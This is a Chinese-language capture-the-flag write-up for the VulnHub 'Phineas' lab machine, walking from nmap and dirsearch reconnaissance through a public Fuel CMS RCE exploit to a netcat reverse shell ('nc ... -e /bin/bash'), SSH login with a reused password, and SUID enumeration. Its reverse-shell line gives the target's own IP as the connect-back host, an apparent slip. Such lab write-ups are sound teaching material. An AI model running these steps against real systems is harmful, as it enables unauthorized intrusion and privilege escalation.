靶机下载地址:https://download.vulnhub.com/phineas/Phineas.ova
将靶机设置为NAT模式并启动。
主机发现&信息收集
nmap扫描本地网段
nmap -sn 192.168.17.0/24
133就是我们的目标靶机。
接着收集靶场信息:
nmap -sV -Pn -O 192.168.17.133
开放端口22,80,111,3306
直接访问80端口,发现无法访问,dirsearch默认字典也没扫出什么东西,使用 kali 自带的字典跑一下
dirsearch.py -u http://192.168.17.133 -e* -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
只发现 structure 目录,但还是访问不了,继续深度扫描查看 robots.txt文件,说明存在fuel目录
访问:http://192.168.17.133/structure/fuel/
跳转到:http://192.168.17.133/structure/fuel/start
再次对 /structure/fuel 进行深度扫描,发现目录
在此处猜测,有一个系统叫做fuel,只不过现在还没发现入口
本地搜索一下 fuel,发现是CMS,后面几个SQL 注入需要先登录
试一下第一个 RCE 脚本
保存到本地,修改一下脚本:
更改47138.py文件的 url 和删除代理
执行一下发现还是不行
估计是路径不对,把所有 /structure 后都加上 /fuel 看下
在访问 /structure/index.php/fuel/ 路径的时候发现了 fuel cms 登录界面
再次修改脚本中 URL 路径并执行
成功执行
nc反弹shell
目标靶机已安装 NC
攻击机:
nc -nlvp 4444
cmd:nc 192.168.17.133 4444 -e /bin/bash
用靶机的bash进行操作,把本机的bash推回来
反弹成功
查看配置文件,看有没有能登录的账号
开放了22端口,使用ssh链接,输入刚才保存的数据库的密码,发现可以进入
看有无管理员权限,发现无
sudo -l
sudo -l 列出目前用户可执行与无法执行的指令。
查找有 suid 属性权限的文件
find / -perm -u=s -type f 2>/dev/null
或
find / -perm /4000 -type f 2>/dev/null